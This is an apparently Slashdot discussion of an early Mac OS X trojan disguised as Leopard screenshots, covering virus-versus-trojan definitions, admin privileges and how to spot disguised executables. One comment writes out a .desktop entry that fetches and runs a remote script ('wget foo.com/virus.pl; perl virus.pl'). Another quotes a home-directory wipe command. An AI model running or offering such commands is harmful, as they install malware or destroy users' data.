First Mac OS X Virus?

bubba451 writes "MacRumors reports on what may be the first virus to affect Mac OS X, disguised as screenshots for the upcoming Mac OS X 10.5 Leopard. From the report: 'The resultant file decompresses into what appears to be a standard JPEG icon in Mac OS X but was actually a compiled Unix executable in disguise. An initial disassembly reveals evidence that the application is a virus or was designed to give that impression.' The virus is said to also spread via Bonjour instant messaging." Update: 02/17 00:09 GMT by P : This is not a virus, it is a simple Trojan Horse: it requires manual user interaction to launch the executable. See Andrew Welch's dissection.

Phew!

Glad I just 'switched' to windows ;-)

(fp?)

Re:Phew!

Should have waited. Dvorak is predicting that Apple will adopt Windows.

I wish I also got paid to be a crackhead.

Re:Phew!

[pHatidic]

I first learned about the Columbine Shooting when checking Slashdot. I first learned about the Columbia explosion by checking Slashdot. Now the first Mac virus. Slashdot brings me news of another life altering national tragedy.

Re:Phew!

[JohanAA]

There's two ways to do this exploit on windows:
1) it'll only work if the title says "Kournikova" or "Britney" - says alot about windows users
2) won't work if the title says "Windows Vista screenshot" - says alot about Vista

:-)

Re:Phew!

[didit]

Dvorak is predicting that Apple will adopt Windows.

Too bad he wrote his article before knowing about this trojan, otherwise he would have seen the big picture: Microsoft is behind this trojan and is going to use it to install Windows on Intel Macs. That's how Apple will "adopt" Windows.

Re:Phew!

That's the best laugh I've had all day:

Will Apple Adopt Windows?

This would be the most phenomenal turnabout in the history of desktop computing. There's just one fly in the ointment.

...the fly in the ointment being I'M ON CRACK! Seriously, he's getting his tips from some professor of psychology now! What's next - will he claim that tarot has shown him the future of Windows?

I didn't have a very high opinion of him before reading that article, but it is now zero. He really will write anything, won't he? It doesn't even have to make sense, that article is non-sequitur after non-sequitur.

Re:Phew!

[Megane]

Dvorak is predicting that Apple will adopt Windows.

What a dumbass. First of all, he's about a month and a half early. (check the calendar)

He's basing this on the ideas of someone else who thinks that removing Firewire from iPods means anything about the operating system Apple will use, never mind that Windows supports FireWire just fine, it's just that PCs have been slow to adopt it. And Apple wants to switch to Windows because because they switched CPUs? You mean to one they had already been making sure for years that their own OS would run on? The one with a much faster update schedule than Microsoft could ever dream of?

Wow. He's one of the oldest and biggest trolls out there in the computer-related press, and he's still trolling. Remember, his target audience is PC Magazine, read by the kind of folks who don't want to believe that it's a mistake for them to still be using Windows. So he's just providing more comfort to them that mean ol' Apple won't take their tattered, filthy, stinking, virus-laden security blanket away. Hey, switch my keyboard already, I'm writing just like Dvorak!

Re:Phew!

[Shanep]

I first learned about the Columbine Shooting when checking Slashdot. I first learned about the Columbia explosion by checking Slashdot. Now the first Mac virus. Slashdot brings me news of another life altering national tragedy.

I first heard about 9/11 while reading slashdot. That was shocking. Then I turned on the telly...

Re:Phew!

[Kittyglitter]

Why? So you can be vulnerable to every other virus on the planet? :-)

Re:Phew!

[soft_guy]

Dvorak has a long history of idiotic predictions, especially ones that bash the Mac.

When the Mac first shipped, he predicted that it would fail because "no one knows what a font is" and "no one cares about having different sized type". He went on to say these things were too complicated for the average business user to understand.

Throughout the 90s he pronounced Apple and the Mac to be "dead" many times. Oh, and he thinks the iBook only appeals to gay people.

Dvorak is a big fat idiot.

Re:Phew!

[madnuke]

Same, its nice to see the mactards saying how they will get the law inforcment agencies onto the 1337 mac virus maker. So does the person that make this get $10,000 now? As wasn't that the prize for creating a mac virus.

Re:Phew!

[Lars+T.]

When the Mac first shipped, he predicted that it would fail because "no one knows what a font is" and "no one cares about having different sized type". He went on to say these things were too complicated for the average business user to understand.

He was spot on, the way the average business user (ab)uses them is proof ;-)

Re:Phew!

what the heck is this?
I use a Mac because it's supposed to be easy to use!
I have to DOWNLOAD this file, unzip it, click OK when warned that the file contains an application, double click on the "JPG," enter my admin password and it doesn't even have the decency to have a payload???
What kind of user interface is this??
I'm switching to windws where the viruses at least properly propegate without the need of extenive user interactoin.

Re:Phew!

[sulam]

Reading the Dvorak piece, you're right, he's on crack!

I guess he doesn't realize just how many people buy Macs specifically because of the OS. He says they'd like to compete on "even ground" with Dell, Sony, etc -- when in fact the OS gives him a high ground to fight from. If Macs shipped with Windows, I bet at least half their current userbase would go from being grudgingly accepting of the steep premium you pay for their hardware to being rightly pissed off. The hardware isn't _that_ much better than what you can buy in the Windows world. Why would I continue to pay 30-50% more and what would I be getting that justified that, and is it something that would be compelling for IT purchasing? Somehow I don't think so.

I say this as someone who has spent over $20K on Apple hardware out of my own pocket in the last 5 years. If Apple shipped with Windows instead of MacOS, that number would be closer to $2K (ie, just the iPods).

Re:Phew!

[Kelson]

Apple will adopt Windows? I didn't realize Windows had been orphaned. Is it in foster care? What happened to its parents?

Trojan Man?

[green+pizza]

Sounds more like a trojan to me. But the question is, how in the world did they get it to show up as a JPEG image and still be executable? And does this script do any damage beyond the user's home directory? I.E., does it have some sort of a rootkit? Or does it simply prompt the user for the root/admin/sudo password?

Somebody better wake up Apple and fix this application-looks-like-a-pretty-JPEG icon bug!!

Re:Trojan Man?

[Epaminondas+Pantulis]

I guess they put the standard JPEG icon in the app's bundle...

Re:Trojan Man?

[fracai]

There's this thing called reading the article... oh, right.

It's a "JPEG" because the author was clever enough to paste the icon of a JPEG onto the executable.
If the user is root, or possibly admin, the script writes files in /Library/InputManagers. If you aren't it does the same in the user Library.
No kit, just a prompt.

http://www.ambrosiasw.com/forums/index.php?showtop ic=102379 as linked from MacRumors has a really good writeup on what is going on.

Re:Trojan Man?

[mstroeck]

Uhm, how are proposing to "fix" this? You can give your application any icon you want, and as long as it looks even remotely like the native JPEG-icon, 95% of users won't notice.

The only way would be some sort of flag that shows up on any icon that represents something executable, and that wouldn't be a fix but a completely new approach.

Re:Trojan Man?

[n3k5]

Sounds more like a trojan to me. But the question is, how in the world did they get it to show up as a JPEG image and still be executable?

It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

It doesn't really disguise as an image. It just uses the OS X standard icon for images as its own icon. However, it does not have a jpeg extension and if you select it in the finder, you will not get a preview thumbnail, thus you would know that opening in the Preview application (which you would do by double clicking) cannot work. Maybe, if you have set your Finder not to display extensions, or just didn't pay attention, you would try to open it in another image viewer, which would fail and not do any harm.

Re:Trojan Man?

[Billosaur]

Update: It appears that there is some debate about the classification of this application, and as it does require user activation, it appears to fall into the Trojan classification, rather than self-propogating through any particular vulnerability in OS X.

Sounds like Mac users will need better protection.

Re:Trojan Man?

How do you protect against "stupid user"??

Re:Trojan Man?

[green+pizza]

How do you protect against "stupid user"??
WebTV?
Etch-a-Sketch?

Re:Trojan Man?

[squidguy]

It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

You raise valid points here. This is a single instance, but undoubtedly more will come and we need to view these developments agnostically.
Unfortunately, despite all best efforts to dissuade the novices, folks still tend to run as root or admin on their systems. A large percentage of Windows virii won't infect unless the user has admin privs, and unfortunately, M$ doesn't do a good enough job of dissuading this in their earlier platforms. Vista supposedly (I haven't hacked on it yet) does a better job of pushing least privilege and a *nix-like SU model (but since at least the 2000 platform, the RUN AS option existed) -- don't know how this'll work with the clueless crowd yet.
The advantage of *nix is that it at least (in most cases) makes the user think twice about running as root.
My point is - if we get novices (and some lazy experienced types) using OS X or RedHat or whatever, some will undoubtedly run as root, admin etc because they are too lazy or too clueless to run as least privileges. Ergo, the existance OS X virii & trojans should not be taken lightly.

Re:Trojan Man?

[PFI_Optix]

Microsoft has been struggling with this question for a long time ;)

Re:Trojan Man?

[n3k5]

It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

Replying to myself here (and green pizza and squidguy) in order to clear up a mistake, I had misunderstood information from another source: Apparently you only have to enter your admin password if you are root (highly unlikely, so I don't know why some sources say 'most users' would have to enter it); otherwise it leaves your system files alone and only touches what it, running under your UID, has write access to. Which usually includes all apps you use. However it's still true that it doesn't do any significant harm. Infected apps stop working, but are easily indentified and thus cleaned because of that 'oompa' xattr. Oh, and it only propagated via iChat, and even then only if you accept files that you haven't asked for.

And if I may lump in a reply to squidguy's post: Lazy, clueless users don't run as root on Mac OS X, since it's not default. Figuring out how to run as root is way more difficult (thus more work, which lazy users loathe and clueless ones won't figure out) that simply entering your password any time you need it. Surely, many people will just enter it every time without thinking about it much, or checking which priviledges are required exactly, but when the dialog pops up even though you didn't ask for having anything about your system changed, and still give your authorization ... well, then it really is your fault, not the system's.

You are of course right when you say more malware will come, and we shouldn't take it too lightly, but as an OS X user, I'm not exactly losing my sleep over the issue either.

Re:Trojan Man?

[erwin]

make your system idiot-proof, and the world will make a better idiot....

Re:Trojan Man?

[CastrTroy]

Maybe we should be able to override the OS so that no matter what icon the executable file says it wants to display, the OS always shows an icon clearly depicting the fact that the file is an executable.

Re:Trojan Man?

[hunterx11]

Actually, there was a similar trojan before disguised as an mp3. Apple responded to this in Tiger by making the .app extension of an application always appear at the end of its filename, ignoring any options to hide extensions. Unless this really has found some exploit, it is just a file.jpg.app.

Re:Trojan Man?

[Pulse_Instance]

They will fix it in the same way that they "fixed" the iPod nanos scratchable screen. Tell people not to use it in the manner that they used it before.

Re:Trojan Man?

[bogado]

A sandbox for the browser would be nice. It the browser could not start any applications automaticaly, and even firefox can do this, it would certainly be more secure.

Re:Trojan Man?

[peragrin]

So in other words. Power users who use unique icons for this will be unaffected as they will notice the difference. Hmm Of course that accounts for 5% of Mac's which is a really low number.

I feel special now :)

Re:Trojan Man?

The question is will this sort of exploit work with Linux?

The main security problem that I can see it that the OS allows executables to reside anywhere. This can be stopped on Linux by using the noexec flag on the home and tmp drives, I assume the same is possible with OSX.

Personally I think that exe files should only be allowed in either operating sytem folders or on the /usr partition, any hardcore users who want scripts in their home dir should change the settings themselves.

If people want to install applications, they should be self contained files which are not executable but need a system buinary to run. I think klix or klik is this theory for KDE. The sooner users unlearn clicking exe files to install programs the better.

Apple and KDE/Gnome should set this as default for Linux now before the Linux monoculture grows too big and we see stuff like this affecting our Grandmas on Linux.

By the way, I notice that the new low permission model in Vista is very flawed because the default action is just to prompt with yes/no when the user wants to escalate their privs. The box uses very weak language like 'are you sure you want to run this' there is nothing about entering a password which makes a user stop and think. The Vista popup is useless since it will be clicked without thinking (Like the stupid 'are you sure you want to send this to the recycle bin' dialog)

Re:Trojan Man?

[devonbowen]

Uhm, how are proposing to "fix" this?

When I download a dmg file with Safari, I get a warning if the dmg contains an executable. (Not sure if that's Safari doing the warning or the code that mounts the archive or what.) Something like this in the code that unpacks tar files would go a long way toward fixing it.

Devon

Re:Trojan Man?

[Kadin2048]

It's almost impossible for a clueless user to run as root on an OS X box.

Actually running/logging-in as root requires either some non-trivial Terminal work, or going in through NetInfo Manager (a fairly intimidating config utility) and enabling the root account (which at least the time I did it, a few years ago, gave you some pretty stern warnings).

That's not to say that you can't have root-like privs -- the default first user on a Mac is an "Administrator," which just means that they can sudo -s and become root temporarily. However to do this you have to authenticate for every action. (Or every 5 minutes or so.) The MacOS "Administrator" level user is not as powerful as the WinXP type of Administrator (which is effectively a root account). Macs have three levels of users: root, Admins (who can sudo), and everyone else (who can't).

So yes, there are definitely ways that a clueless person could damage themselves with a trojan, if they just mindlessly type in their password into any box that comes up, regardless of the context in which they're being asked, but there is at least one more step stopping you from doing it compared to running on a Windows system.

Re:Trojan Man?

[Vicsun]

An honest question (I'm pretty ignorant):

How can a user differentiate between an executable file with a pretty icon and a jpeg in OSX (or Linux for that matter)? In Windows there are file extensions so a trojan with an icon will still have to be called something.exe in order to do any damage. How can I tell the difference between a binary file with an icon and a file that doesn't execute any code with the absense of extensions?

Please don't laugh :(

Re:Trojan Man?

[Kadin2048]

I was thinking about this. I can't imagine it would be all that hard -- there is already a visual flag applied to all "alias" (that's symlink) files, so it doesn't seem like it would be out of the question to do something similar for executables, based on the eXecute bit.

However what I'm not sure about is how you'd make this work for MacOS bundles -- unlike UNIX applications they're not just single files; the thing that you click on in the Finder to launch a MacOS app (at least a Cocoa one) is actually a directory if you look at it in the Terminal, it just has the hidden suffix of ".app" (so for instance the program Mail in the finder is actually the directory/folder Mail.app). The actual executable file is normally buried somewhere within the folder -- usually like (appname).app/Contents/MacOS/executablefile.

I suppose what you'd have to do is put the visual flag on if a file was either a directory ending in ".app", or if the regular eXecute bit was set on a file itself.

Re:Trojan Man?

[Digi-John]

You can avoid all of these problems by shunning graphical file manager stuff in favor of the command line. That file that was supposed to be a jpeg--try opening it with "display suspiciousfile" and you'll get an error. The only way to run it from the command line would be to explicitly say "./suspiciousfile", probably only after changing permissions so it becomes executable.

Ah, the joys of xterm.

Re:Trojan Man?

Etch-a-Sketch?

If you sneeze while holding it you probably have to restore your destroyed data from backup.

Re:Trojan Man?

[Ortega-Starfire]

All you have to do is right click... oh, nm

Re:Trojan Man?

[cortana]

On Linux (and other traditional Unixes) you must deliberatly set the execute permission on a file before you can execute it.

Re:Trojan Man?

[moonbender]

I don't have a whole lot of experience with OS X, but I'd guess that executables are marked as such in their file info dialogue. Apart from that, executables are either folder bundles with the (hidden?) .app extension or any other file set to be executable via the standard Unix/Posix way.

On a sidenote, standard Windows configuration hides known file extension - including .exe. Also, .exe is far from the only way executable code may be started, there's also the old .bat, and .cmd and a number of scripting files which are executed on a double click. As far as I know, all of these are hidden by default. An easy way to determine what will happen on a double click without having to be aware of the extension is right-clicking the file and checking for the bold entry in the context menu. If it says something like "execute script", well, you figure it out.

Re:Trojan Man?

[Kadin2048]

Safari does not automatically start any executables without prompting, at least that I've ever seen.

It will also prompt you before completing the download of a disk image file which contains an executable (although I'm not sure whether if you click "cancel" at this point if it deletes the file completely, or just stops it from being mounted). So theoretically, if you were downloading something that you thought were screenshots, Safari would warn you that you were actually getting a program. The language that it uses is pretty straightforward, also. I think it says something like "The file you are downloading contains a program, which could potentially harm your computer. Do you want to continue?"

You'd have to be pretty clueless for that not to give you pause, if you were downloading something that you KNEW wasn't a program. I don't doubt that some people are going to do it, but at a certain point you can't blame the OS for user stupidity. It's one thing if a system allows an action you take on the internet in a browser to hose your computer, it's quite another if it lets you download a file, click "Yes" when asked if they're sure they want to download, run a program, type their password, and their files get hosed. You can't prevent the latter from happening while still having the system be halfway useable.

Re:Trojan Man?

[diegocgteleline.es]

Somebody better wake up Apple and fix this application-looks-like-a-pretty-JPEG icon bug!!

You're welcome, you can do the same with .desktop files in linux: Set Name= and Icon= fields to something fancy. At some point I test it and I was able to put things like "Run=wget foo.com/virus.pl; perl virus.pl" so you've a virus just like windows - market share doesn't allows such virus to be succesful of course but the problem is the same than windows .exe files. In a perfect world .desktop files would require +x to be interpreted (just like you do with scripts) and we'd be safe and virus couldn't spread through mailers, but good designs aren't that appealing for some open source coders these days it seems.

Re:Trojan Man?

[Megane]

If the user is root, or possibly admin, the script writes files in /Library/InputManagers.

Um, why is my /Library chmod 775? It's that way on all four OS X machines that I can reach via SSH right now, two 10.4.x and two 10.3.x. Because there is no /Library/InputManagers in my /Library, so any program running under an admin account on my machine could create one. Admittedly, /Library/StartupItems being group-writable would be a much worse security violation (stuff in there runs as root at startup), and I have seen cases where installers will create one chmod 775 or 777, but I don't see any reason why a program that isn't setuid root (in other words, requiring the security dialog first) should be able to create new directories or drop files into /Library.

Anyhow, this is not a virus, it's a trojan. A virus attaches itself to existing executables (boot blocks included in the definition of "executables"). This is a trojan, and if it replicates, then it's a file-propagating worm (as opposed to the e-mail- and network- propagating worms that plague Windows). So far there is still no malware for OS X that doesn't depend upon human stupidity for propagation. Whether that be saving an e-mail attachment to disk and then double-clicking on its icon on the desktop (this thing won't auto-open while reading e-mail), or simply using bad username/password combinations allowing a brute-force break-in over SSH, there is still no sign of any kind of fully-automated malware for OS X.

In the meantime, I'm going to be doing a lot of "sudo chmod 755 /Library".

Re:Trojan Man?

[Kadin2048]

Um, I'm admittedly not looking at my OS X box right now, but unless this change was made in the 10.4.4 update (the one released just in the past few days via Software Update), the ".app" extension is hidden on most Applications, at least with the general "hide extensions" preference turned on in the Finder.

The MP3Concept trojan didn't disguise itself because the Finder was hiding the ".app" extension, anyway. It's filename really was "MP3Concept.mp3". If you had gone in and looked at it via the Terminal, that's what you would have seen.

It was an executable because of the way its metadata was set: it had a "type" of APPL, for application, thus it would execute when double-clicked. The icon came because the creator had simply given the iTunes MP3 file icon as the application bundle's custom icon resource (this is the same way a legitimage application sets itself to a custom icon). It wasn't being assigned automatically by the Finder or anything else. This type of exploit isn't really new, it would have worked just as well on MacOS9 (and probably even better); back in the day there were lots of dumb little tricks that you could do to take advantage of the same thing (you could make small applications that put up rude dialog boxes, for instance, and disguise them as documents).

And (as screenshots on the link below show), if you had looked at the MP3Concept.mp3 file in the Finder's list view, it would be correctly reported as an Application, not a Document. (Because the Finder looks at the file metadata in addition to the filename, when determining what it is.)

Without appending ".app" to the end of every Carbon application out there still in use, which in some cases might cause problems, and then not letting the user turn off the displaying of extensions (which would piss off a lot of longtime Mac users), I don't think there's really any way to prevent this. I find the change you're saying Apple made somewhat doubtful, although I'm open to any evidence you have.

More info on the MP3Concept trojan:
http://daringfireball.net/2004/04/crying_wolf

Re:Trojan Man?

[Shanep]

All you have to do is right click... oh, nm

Humour aside, that is actually correct. Right click if you have a two or more button mouse and choose Get Info. Notice "Kind" will state "Application". If you have a single button mouse you can Control click in place of right clicking. If it is a JPG then it should say "JPEG image".

Re:Trojan Man?

[ioErr]

In the old days Mac OS used to distinguish aliases from normal files and folders by showing their names in italics. That was a very good thing, but unfortunately it has been replaced by a tiny Windows-style arrow in the icon's bottom left corner instead. On the other hand, there was never an easy way to tell applications from documents or folders at a glance which always bothered me, not so much because of the threat of trojans as because you don't want to accidentally launch another program which just happened to look like a text document (curse those readmes) when you only have 10 MB of RAM.

Anyway, back to the present. A simple, welcome solution, would be to just show the names of applications in bold text. That would be helpful to power user and novice alike, and it would probably also look good.

Re:Trojan Man?

[NutscrapeSucks]

Sounds more like a trojan to me.

Just to be clear, 98% of the "viruses" which affect Windows boxes are actually trojans, and the other 2% are worms. There's very few true viruses anymore for any platform.

Re:Trojan Man?

[level_headed_midwest]

In Linux, executables don't generally have extensions on them. But you can easily tell what a file is by looking at its properties at the MIME type. It will not say, "JPEG Image" but "application/binary."

Re:Trojan Man?

[Syberghost]

I can't figure out how this qualifies as a virus and this doesn't.

Either this isn't a virus, or the "first" was two years ago.

Re:Trojan Man?

[NutscrapeSucks]

Apart from that, executables are either folder bundles with the (hidden?) .app extension or any other file set to be executable via the standard Unix/Posix way.

Actually, I get the impression that this is an old-style Mac executable, which does not use the .app extention. Instead it uses a hidden "APPL" file type which is not normally visiable to the user. This is a fundemental issue that goes back to the original MacOS in 1984 -- there's just no easy way to distingish an executable from a non executable file on Mac systems.

Furthermore, it appears that the default perms on OSX provide +X access to everyone, everywhere so traditional *nix-style "chmod" is never needed.

Re:Trojan Man?

[Megane]

And if I may lump in a reply to squidguy's post: Lazy, clueless users don't run as root on Mac OS X, since it's not default.

It's not only not the default, it is in fact very complicated to allow logins using the root account. Lazy, clued users don't do it either. Thanks to sudo and the security dialog, there is also no need to allow root logins. One important thing about OS X security is that there are absolutely no default accounts that allow logins. So anyone who wants to guess weak passwords over SSH also has to guess for account names. This means that they actually have to find out something about the system that they are trying to break into.

Please, folks, don't use your login password as a password for web sites. Many times the password is sent in the clear or nearly so (base64 encoded), and is easily intercepted. If you use the same username and password on a web site as you do to log on to OS X (or Linux or any other *nix), you're begging to get hacked.

Re:Trojan Man?

[Shanep]

It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

You have to enter the admin name and password to delete your own user files? I think not and those are the files that are valuable to me.

I keep occasional compressed dd images of my OSX installs (from the shell in the OSX install media and a USB or FW drive), so I am not too fussed about losing an install, it's my own files which matter to me. I back them up two, but I don't want them stolen either.

Re:Trojan Man?

[Shanep]

I should have mentioned that I'm refering to potential future malicious code using this sort of trickery and not of that in the article. I'm thinking more from the OSX point of view than this specific malicious code.

Re:Trojan Man?

[Kadin2048]

Anyway, back to the present. A simple, welcome solution, would be to just show the names of applications in bold text. That would be helpful to power user and novice alike, and it would probably also look good.

I like it. Good idea.

While we're at it, maybe they can give us back our aliases in italics at the same time; that was a nice 'no brainer' feature if I ever saw one.

That will probably go over better with application developers than some sort of visual indicator on the application's icon that would mess up their pretty custom look. Bolded text is definitely the better way to go.

Re:Trojan Man?

[qw(name)]

you must deliberatly set the execute permission on a file before you can execute it

Unless, of course, the file is already executable.

Re:Trojan Man?

[larkost]

This has the executable bit set... it comes out of the tgz package with it intact... just like what would happen on linux.

Re:Trojan Man?

[bogado]

I am not saying executing the file it self. But if you download a .mp3 file does it play automaticly? It is because safari has started an external program. The browser can be very fine, but imagine that the mp3 player have a flaw that can run executables? Then someone could hide a malware into a mp3 file, but this does not concern only mp3, all the files that have 'viewers' can be affected.

A sandbox that I was proposing, but did not write it down (so I am lazy :-P) was suposed to run both the browser and the helper application in a special environment, maybe something as simple as a 'nobody' user that have no rights over the real user data or even an emulated layer that have no access to anything in the computer.

So I was lazy, did not specify what I meant and that was a bad post. :P No one is perfect. :-D

Re:Trojan Man?

[Eccles]

Unfortunately, despite all best efforts to dissuade the novices, folks still tend to run as root or admin on their systems.

That's true on Windows, because it's a PITA otherwise. There are plenty of apps that won't run except as admin, or unless you've somehow fixed some set of permissions that is not identified when you try (and fail) to run the app.

I try to run not as admin on Windows. I installed an app called, I believe, FileTweak recently. Now every time I try to get a file's properties, I get a half-dozen alerts about not having the proper permissions before the properties pane. Woo hoo!

Macs are much more usable without being admin, which is one reason I'm about to get an iMac.

Re:Trojan Man?

[jscotta44]

How is "display suspicious file" any different than opening suspicious file in a viewer like Preview on the Mac? Preview will not run an executable any more than the "display" command will. So how is the command line giving you more protection?

The real protection comes from being suspicious, in the first place.

Re:Trojan Man?

[m50d]

This is a trojan, and if it replicates, then it's a file-propagating worm (as opposed to the e-mail- and network- propagating worms that plague Windows).

Erm, if it spreads via IM as the summary suggests, then it's exactly the same as what plagues windows. It may not technically be a virus under the original meaning of the term, but it's exactly the same thing as what we normally see called "viruses" on windows.

Face it, no OS is immune to these things.

Re:Trojan Man?

[sootman]

Correct me if I'm wrong, but OS X, like RedHat Linux has for quite a while, uses single-user groups--that is, each user is the only member of a group which has the same name as the user's name. So the group bits are not entirely meaningful. Easy enough to test: can you
touch /Users/<someone else>/Library/test
? I can't. If you can't you shouldn't need to go from 775 to 755.

Each OS X system I have (10.3) shows the following ownerships in /Users/:
'Shared' owned by root:wheel
'admin' (first user created) owned by admin:staff
all other users--admins and non-admins:
'whatever' owned by whatever:whatever
10.0-10.2 made bigger use of the Staff and Wheel groups, IIRC, but since 10.3, it's been one user per group for all but the first user created. (And that's why the first account I create is a generic admin account named admin--because early versions of OS X went batshit if you deleted the first user ever created, and I've kept the habit ever since. And it's always nice to have a clean account to switch into for testing.)

Re:Trojan Man?

[v1]

FYI those are called "badges". In addition to the link arrow, icon views in finder can also display red (-) "no access" badges on them. Open another user's home folder and you'll see what I mean. Drop folders have a downward arrow on them, as the Drop Box in another user's home folder will show.

So this technique is already in use, just not for this purpose.

It would be a nice touch for OS X to allow you to enable an "application badge" on any icon that was executable, scriptable, or otherwise would cause any contained code to execute when double clicked. Maybe a black letter "A" inside a green circle would work nicely. This would work just like the current badges, where the badge is not part of the icon, but rather is added by the OS as it is being rendered, so that the app could not prevent it from displaying. This would also require apple to maintain some control over the badge api's so that malware could not hook into the badge system and patch it to either not work or not work correctly. (like to make the badge the same as the covered part of the app's icon, for infected files) I say this because apple tends to make everything they can be scriptable or patchable unless they have reason otherwise.

And to call this a virus is sensationalism at best. Commonly accepted requirements for viruses include:

1 unassisted introduction into a host, through networking or automatic "play when inserted" media rules, bugs
      in networking code, or back doors
2 automatic execution of the contained script, code, or commands upon introduction to the host system, either
      by design or bug, executing in a security mode sufficient to perform (3) and (4)
3 the ability to harvest or generate a list of additional hosts or contact points vulnerable to (1)
4 propogation of a viable copy of itself to host systems found in (3)

This "malware" is not capable of 2 because it requires manual execution by the host's operator. Admittedly, the security education level of the average macintosh owner is lacking enough that we could say that a dialog that pops up and asks for your admin password has achieved automatic execution with privileges, because so many users are like pavlov's dog, see password promt, type in password. But this mallware doesn't even automatically execute on the host system, it merely baits the user into double clicking it.

After reading the technical analysis, it also appears to fail at 4 due to the pointer bug that was identified.

Even if the pointer bug was fixed, it would still not qualify as a virus. It is at best a trojan. This is not too much more sophisticated than a "virus" that is a one-line applescript, "sudo rm -rF ~/*". Big whoop, we saw this one what, six months ago?

Re:Trojan Man?

[h3rmanni]

It replicates, so it *is* a virus. Whether user has to do something or not has no significance. Stop calling it a trojan to make it sound like it's not that bad. It's a virus.

Re:Trojan Man?

[eMartin]

I love it when people talk about "real harm" to computers.

Sure, I spend a day or two to reinstall if something goes wrong, and it takes a while for me to get settings back to how I Like them, but I would be MUCH more concerned with the 300 GB of personal and work data that I have on my computer.

And yes, I do have backups of most of it, but restoring and reorganizing that stuff would take me way longer than reinstalling software.

Re:Trojan Man?

[Gropo]

An even more novel solution: Apply a big fat red exclamation point to the bottom-right of the icon if the executable has never been run before--alongside prompting the user before running the executable for the first time (as is currently the case).

Re:Trojan Man?

[somersault]

does OSX not display file extensions? The first thing I do when I have a new account on a windows machine is show hidden files, and file extensions.. Gnome/KDSE seem to show file extensions by default (am not so bothered about hidden directories and files since there are loaaaaaaaaaaaaaaads in the home directory..)

it really is a pretty dumb idea not to have file extensions enabled, though I know that Macs use resource files rather than file extensions to determine filetype, but I didnt think that pictures would have separate resource files.. >_>

Re:Trojan Man?

[KillerDeathRobot]

Open-apple + i (for get info) eliminates having to right or control click at all. :)

Re:Trojan Man?

[NatasRevol]

"Um, why is my /Library chmod 775?"

Simple. All the users need to READ & EXECUTE files in the Library. Look what's in there. Or better yet, try setting it to 770 or 750 and login as a regular user. I'm not sure you even could log in.

It's also root:admin as owner:group for the folder. Thus you need to be at least in the admin group to affect any change in the Library folder. You don't think the admin group should be able to change the system library? That's your right, but it's not very logical. All admin users are one step away from root as su -s or sudo anyway.
So, chmod 755 won't help much as it will still just ask you for you password to make changes in Library. It's better to run as a non-admin user.

But, I agree this isn't a virus. It's hardly a trojan. It's a self propgating script that requires several user interactions before doing anything. Since it only affects the user space - per the OS X security model - this will never get too far. Especially in the corporate environment where only ignorant IS folks let their users run as admin. Yes, some users run as admin and will get screwed, but that will never change - ignorance will always reign.

Re:Trojan Man?

[JWW]

I agree its a trojan, not a virus. If you turn on file extentions, you'd see that its a .app with a jpeg icon. They're just being sneaky, not really using a flaw in the OS.

Re:Trojan Man?

[c_fel]

I don't own a mac, but I know it is similar to my Linux box. Why doesn't it have a .jpeg extension ? On windows, an executable must be .exe, .com, .bat or .scr, but on a unix system, it just has to get the executable flag set. I guess if I was the trojan writer, I would have added the .jpeg extension (but then again, maybe the mac is different from UNIX on that point)...

Re:Trojan Man?

[Vladimus]

So far there is still no malware for OS X that doesn't depend upon human stupidity for propagation.

I've said it before, I'll say it again: Never underestimate the power of human stupidity.

Re:Trojan Man?

[v1]

A few people have suggested that it "might" ask for an admin password.

If the operator is an admin, he is a member of the admin group. This means he always has additional access to files and folders. It does nothing to allow privileged access to processes. This means his script can do things like add global fonts, create global startup items, etc. All that he needs to install "hooks" to catch the next user or execute on the next reboot, all without having to enter a password.

If you want privileges, like to change the startup disk, you need to elevate privs with something like sudo. That is what prompts for a password. Fortunately in the OS X security model, the system doesn't give you the option to bypass this requirement or to fish the password out of the system, so at least for these things, OS X is quite secure. The only exception to this is if you are logged in as root, you already have privileges and do not need to use sudo to access secured processes and structures. Some developers don't even bother checking for this possibility, as I have ran installers while logged in as root and have been prompted for my password anyway. I would throw out a guess that fewer than 1 in 400 mac users have ever logged in as root, and fewer than 1 in 3000 log in regularly as root.

Re:Trojan Man?

[Haeleth]

An easy way to determine what will happen on a double click without having to be aware of the extension is right-clicking the file and checking for the bold entry in the context menu.

I just tried this, and on Win2k, at least, it just says "Open" for .exe, .bat, and .jpg. So, no, that's not a foolproof approach for everyone, even if by some chance it's different in XP.

Re:Trojan Man?

[LordSnooty]

The very flaw, of course, that people regulary rip into Windows over. I've seen Windows' "hide extensions for known file types" option described as an OS flaw in the past, but of course in AppleWorld it's the trojan writer being "sneaky".

Re:Trojan Man?

[sootman]

I would like to see this trojan myself. Pasting an icon is trivial, and the fact that it can do things to other users (via sudo or something similar) when run as an admin user *without* prompting for an admin password is surprising--everything I've seen, if you're going to do an installation, requires an admin's password, even if you're logged in as an admin at the time. Also, doesn't 10.4 pop up that little "you're running this application for the first time" window? I'd like to see this myself.

In any case, this is why I say SCREW PRETTINESS. If a file's ability is going to be determined by its name, make entensions mandatory and un-hideable. For anything to respond in the GUI, that is. Apps and scripts called from a CLI don't need extensions, but clicking on a file with no extension should not do anything, ever, except prompt the user "what do you want to do?" with the only option being to try to VIEW the file (based on the first few bits)--"go ahead and try to execute whatever this is" should *not* be an option. Legacy OS 7-9 files present an issue but I'm sure it's nothing the collective minds in Cupertino can't figure out. App bundles would always show .app? Too fucking bad. Computers are too important not to know what's going on with them.

Clever as the author was, if he was *really* smart, he would have, in addition to copying everything else he does to /tmp/ as described on the Ambrosia site, unpacked one screenshot and opened it with Preview. If users saw what they were expecting, they'd be that much less suspicious.

Re:Trojan Man?

So far there is still no malware for OS X that doesn't depend upon human stupidity for propagation.

You can make distinctions like that, but then you have to make it on the Windows side as well. Yes, other exploits have existed, but the real life big problems in the Windows world now are mostly Trojans and IM/mail propagating worms with an element of social engineering. Like this.

Re:Trojan Man?

It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

Keep in mind there have been successful Windows worms that come in encrypted zip files. You have to open the zip, type in a password from the mail message, and then run the executable inside.

Re:Trojan Man?

[dfgchgfxrjtdhgh.jjhv]

